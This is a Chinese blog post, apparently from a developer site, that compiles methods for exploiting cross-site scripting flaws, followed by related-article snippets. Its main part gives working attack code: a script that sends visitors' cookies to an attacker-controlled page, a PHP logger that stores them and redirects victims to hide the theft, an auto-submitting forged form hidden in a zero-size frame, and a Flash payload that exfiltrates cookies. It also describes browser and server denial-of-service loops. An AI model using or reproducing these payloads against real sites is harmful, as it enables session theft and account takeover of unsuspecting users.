跨站脚本漏洞的利用

最新推荐文章于 2024-08-17 16:48:35 发布
最新推荐文章于 2024-08-17 16:48:35 发布
阅读量878 收藏
点赞数
文章标签: 脚本 flash javascript 服务器 html 浏览器

所谓跨站脚本漏洞,小弟认为是指用户能够在网页 上添加任意HTML代码并使其被浏览器执行的漏洞。小弟认为此漏洞跟跨站脚本没 有必然联系,只不过此漏洞的通常利用方法都要结合另一站点(通常是可以自己控制的)上的脚本才能完成,故得名。

本文仅收集X档案曾刊登的对此漏洞的利用方法,权当小结,并未进行创新。希望能抛砖引玉,众大虾发现有什么 错漏请指正和补充。

一、攻击代码
1、偷取cookie的代码:
<script>window.open("http://www.yoursite.com/recordcookie.php?"+document.cookie)</script>
注:
(1) http://www.yoursite.com/recordcookie.php 是可以自 己控制的脚本,功能是要从页面参数中获得并保存 信息(对于本例的“信息”就是cookie)
(2) 一个recordcookie.php样本:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
header("Location: http://www.originalsite.com ");
?>
最后一句转回原来的站点使增加隐蔽性
(3) 如把脚本中的“window.open”替换为“location = ”,则不会打开新窗口,但变成凡进入显示包含该<script>脚本的页面都会跳转到你的recordcookie.php。如果你的 recordcookie.php最后一句跳转回的地址又包含该<script>脚本,则可能会出现死循环。

2、拒绝服务(DoS)攻击
(1) 攻击浏览用户:写入死循环脚本,使用户浏览器死循环
(2) 攻击其它服务器:在漏洞站写入访问目标服务器的脚本,当有大量用户浏览漏洞站时,就会耗尽目标服务器的脚本。
注:不知道把目标服务器设定为漏洞站时会有什么后果。

3、伪造表单并使自动提交
先写入伪造的表单,并在后面加上如下代码使其自动提交:
<script>this.document.forms[0].submit()</script>
注:
(1) 由于提交表单会使页面跳转,所以最好把伪造的表单和那段<script>防于一个0高0宽的框架中。
(2) 由于伪造的表单无法获得并输入验证码,所以采用验证码可预防此漏洞。

二、漏洞所在
1、动态网页程序没有对输入数据过滤HTML标签,则直接在输入数据中嵌入攻击代码。
2、早年IE存在img标签漏洞,如果img标签中的src指向一个文本文件,这个文本文件会被视为HTML而被IE执行。对于允许上传图片,或能使页面 出现可控的img标签(例如论坛中有时支持诸如 的标签以允许贴图),则可利用此漏洞。使受控的img标签的src属性指向一个自己做的“图片”,当然这个“图片”其实是文本文 件,其中是攻击代码。例如在论坛中发一个帖子,内容是 ,然后用记事本写一段攻击代码,并另存为css.gif(注意扩展名是gif),上传到yoursite.com上,浏览这个帖子 的人就会中招。但是打了补丁的IE恐怕不会受此影响。
3、利用flash,只要能在页面中嵌入可控的flash,然后利用flash的getURL函数。例如在论坛发个帖子,内容是 [flash]http://www.yoursite.com/css.swf[/flash],然后做一个flash,动作中要加上 “getURL("javascript:攻击代码");”,例如获取cookie的代码是 getURL("javascript:window.open('http://www.yoursite.com /recordcookie.php?'+document.cookie)");,保存并上传到www.yoursite.com/css.swf ,当然recordcookie.php也要 准备好才能工作。

machack
关注
XSS 跨站脚本
m0_66618018的博客
11-05 2017
xss跨站脚本
跨站脚本攻击xss利用-beef攻击-演示
jklbnm12的博客
02-09 1028
0x0环境 主机A win10:10.51.20.60(wifi) 主机A中的虚拟机kali(攻击者):192.168.110.129(NAT) 主机A中的虚拟机win2003(受害者):192.168.110.132(NAT) 0x1 配置 0x11 beef配置 Beef的配置文件在 /usr/share/beef-xss/config.yaml Host:kali IP Port:beef监听端口默认3000 public:主机A(接入外网的电脑IP) public_port:主机A中空闲的端口,我
跨站脚本攻击深入解析之:漏洞利用过程
blackbean的专栏
03-09 887
跨站脚本的名称源自于这样一个事实,即一个Web站点(或者人)可以把他们的选择的代码越过安全边界线注射到另一个不同的、有漏洞的Web 站点中。当这些注入的代码作为目标站点的代码在受害者的浏览器中执行时,攻击者就能窃取相应的敏感数据,并强迫用户做一些用户非本意的事情。  在本文的上篇中,我们详细介绍了当前Web应用所采取的安全措施,如同源策略、cookie安全模型以及Flash的安全模型;
web常见漏洞——XSS
最新发布
m0_64365018的博客
08-17 1280
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等,xss又分为了三种类型分别为存储型反射型DOM型。
跨站脚本执行漏洞利用技巧两则
com0do的专栏
12-06 999
谈到跨站脚本执行漏洞,想必大家已经比较熟悉了吧?这里向大家介绍两则利用跨站脚本执行漏洞攻击 的技巧,当然我也会为大家提供临时解决方法。废话少说,下面我就开始讲。【技巧一】大家都知道文件上载吧?很多网站都提供了这个功能。利用文件上载进行攻击的方法很多,就不赘述 了,这里主要介绍一下如何利用文件上载进行跨站脚本执行漏洞攻击。我们还记得去年闹得沸沸扬扬的CrazyBird发现的IE的漏洞吧?原文可以从下
跨站脚本_跨站脚本介绍
weixin_26636643的博客
09-19 400
跨站脚本Users are not to be trusted! 用户不可信赖! …okay, I know that sounds dramatic, but there is a lot of truth to that rather bold statement. In this post, I will be diving into the importance of checking...
跨站脚本执行漏洞详解与防护
01-20
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
【jQuery Mobile 漏洞跨站脚本攻击风险】 jQuery Mobile 是一款广泛使用的前端开发框架,特别是针对响应式Web应用和移动设备优化。作为jQuery框架的一个组件,它提供了丰富的功能,包括对HTML5的支持,使得开发者...
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
跨站脚本漏洞(XSS)示例
04-15
跨站脚本漏洞(XSS)是网络安全领域中常见的攻击方式之一,主要发生在Web应用程序中。这种漏洞允许攻击者在用户浏览器中注入恶意脚本,从而可以窃取用户的敏感信息,比如Cookie、会话令牌或者执行其他恶意操作。在...
跨站脚本(XSS)的介绍
专注于大数据方向,区块链,前后端,数据可视化,人工智能等领域
06-14 3066
跨站脚本 (XSS) 攻击是一种注入,其中 恶意脚本被注入到其他良性和受信任的脚本中 网站。当攻击者使用 Web 应用程序执行以下操作时,会发生 XSS 攻击 发送恶意代码(通常以浏览器脚本的形式)到 不同的最终用户。允许这些攻击成功的缺陷是 相当普遍,并且发生在 Web 应用程序使用来自 用户在其生成的输出中,而无需对其进行验证或编码。攻击者可以使用 XSS 向毫无戒心的人发送恶意脚本 用户。最终用户的浏览器无法知道脚本应该 不可信,并将执行脚本
跨站脚本攻击XSS介绍、原理、分类、利用、防御
qq_37432174的博客
11-22 3132
跨站脚本攻击,恶意攻击者插入恶意Html或Script等脚本代码到用户浏览的web网页上,当用户浏览该页之时,因WEB应用程序对用户输入过滤不足,嵌入其中Web里面的恶意脚本代码会被执行,从而达到恶意攻击用户的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个基础上,黑客可以轻易地发起Cookie窃取,会话劫持,钓鱼欺骗等各种各样的攻击。
浏览器原理--跨站脚本攻击(XSS)、CSRF攻击
xuan的博客
06-07 2324
(1) XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DOM 中注入恶意脚本,从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段。(2)恶意脚本都能做哪些事情(3)恶意脚本是怎么注入的1、在一个反射型 XSS 攻击过程中,恶意 JavaScript 脚本属于用户发送给网站请求中的一部分,随后网站又把恶意 JavaScript 脚本返回给用户。当恶意 JavaScript
WAF绕过-漏洞利用之注入上传跨站等绕过
硫酸超的博客
10-02 2443
WAF绕过-漏洞利用之注入上传跨站等绕过SQL 注入文件上传XSS 跨站其他集合 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload(现在不行了) from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGH def tamper(payload, **kwargs): retVal = "" if payload:
漏洞利用脚本[exploit]编写
weixin_34194551的博客
02-21 751
为什么80%的码农都做不了架构师?>>> ...
跨站脚本攻击漏洞(XSS):基础知识和防御策略
热门推荐
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础篇
跨站脚本漏洞(以Pikachu为例)
m0_46467531的博客
01-26 270
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言概述常见类型形成原因一、反射型XSS反射型XSS(get)反射型XSS(post)二、存储型XSSDOM型XSS总结 前言 概述 XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的地位。 XSS是一种发生在Web前端的漏洞没所以其危害对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以集合浏览器自身的漏洞对用户主机进行远程控制等。 常
渗透测试技术----常见web漏洞--跨站脚本攻击原理及防御
wwl012345的博客
08-16 3356
一、跨站脚本攻击介绍 1.跨站脚本攻击简介 跨站脚本攻击(Cross-Site Scripting)简称为XSS(本来为CSS,但是与前端语言CSS容易产生歧义,故取名为XSS),XSS是一种针对于网站应用程序(Web客户端)的安全漏洞攻击技术,是代码注入的一种,它允许攻击者将恶意JS代码注入到网页,这样其他用户在访问网页时就会受到影响。攻击者利用XSS代码攻击成功后,可能得到一些高权限来执行一...
XSS攻击:跨站脚本漏洞实例解析
“XSS_跨站代码大全” XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取敏感信息或者执行其他恶意操作。下面将详细解释几种常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值